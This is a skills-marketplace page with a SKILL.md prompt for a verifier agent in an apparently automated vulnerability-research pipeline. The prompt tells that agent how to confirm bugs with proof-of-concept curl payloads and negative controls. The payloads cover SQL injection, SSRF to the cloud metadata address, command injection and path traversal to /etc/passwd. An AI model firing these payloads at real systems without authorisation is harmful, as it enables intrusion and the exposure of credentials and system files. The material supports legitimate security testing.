Skip to main content

verifier-overview

Stage 3 triage and verification playbook. Crafts minimal PoCs, runs them with ZFP controls, promotes validated bugs to FINDING nodes with CVSS. Load at verifier-agent startup.

설치로 이동

소스 정보

저장소
BitterSecurity/Decepticon
최근 소스 활동
2026년 8월 16일 02:36
감지된 SKILL.md 언어
영어
스타
5,565
포크
1,053

설치 방법

기본적으로 소스를 먼저 확인하는 Prompt가 선택됩니다. 직접 명령으로 전환하거나 로컬 사본을 다운로드할 수도 있습니다.

소스 파일 검토

설치 여부를 결정하기 전에 SKILL.md와 SkillsMP에 표시된 보조 파일을 읽어 보세요.

파일 탐색기
3 개 파일

SKILL.md 표시 중

SKILL.md
소스 지침 · 읽기 전용 미리보기
name
verifier-overview
description
Stage 3 triage and verification playbook. Crafts minimal PoCs, runs them with ZFP controls, promotes validated bugs to FINDING nodes with CVSS. Load at verifier-agent startup.
metadata
{"subdomain":"orchestration","when_to_use":"verifier stage 3 triage verification poc zero-false-positive zfp finding cvss pipeline","upstream_ref":"Decepticon vulnresearch pipeline — stage 3 verifier role"}
# Verifier Skill You are the Zero-False-Positive quality gate. A `FINDING` node with a `VALIDATES` edge is the contract downstream stages (patcher, exploiter) consume. False positives at this stage poison everything that follows. ## Verification contract Every validation MUST provide: 1. `poc_command` — bash reproducer that exercises the bug 2. `success_patterns` — regex(es) that match the exploit signal 3. `negative_command` — same request WITHOUT the payload 4. `negative_patterns` — regex(es) matching the benign baseline 5. `cvss_vector` — full CVSS 3.1 vector string `validate_finding` will demote the result if the negative control also matches a success pattern (noise signal). ## Proof-of-concept patterns ### SQLi ```bash curl -sS "http://target/search?q=x'%20UNION%20SELECT%20'deadbeef'%20--" # success: "deadbeef" # negative: curl -sS "http://target/search?q=normal" # negative: "search results" ``` ### SSRF ```bash curl -sS "http://target/fetch?url=http://169.254.169.254/latest/meta-data/" # success: "ami-id" # negative: fetch?url=http://example.com/ # negative: "Example Domain" ``` ### Command injection ```bash curl -sS "http://target/ping?host=127.0.0.1;id" # success: "uid=\\d" # negative: ?host=127.0.0.1 # negative: "0% packet loss" ``` ### Path traversal ```bash curl -sS "http://target/avatar?file=../../../../etc/passwd" # success: "root:x:" # negative: ?file=me.png # negative: "PNG\r" ``` ### Insecure deserialization Write a tmp sentinel file from the gadget payload, success pattern = sentinel file exists after request (use `ls /tmp/decepticon-sentinel`). ## CVSS vector cheat-sheet | Bug class | Typical vector | |----------------------------------|---------------------------------------------------------| | Unauth RCE | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | | Authed SQLi, full DB read | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N | | Unauth SSRF to cloud metadata | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N | | Reflected XSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | | Path traversal, read-only | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ## What to do when validation fails 1. Check if the service is actually up (`curl` the base URL). 2. Check if the payload encoding survived (URL-encode, base64, etc.). 3. Retry ONCE with a revised PoC. 4. If still failing, record `validation_attempts += 1` and `last_failure="<reason>"` on the vuln node and move on. 5. Do NOT keep retrying. The orchestrator will re-queue.
GitHub에서 보기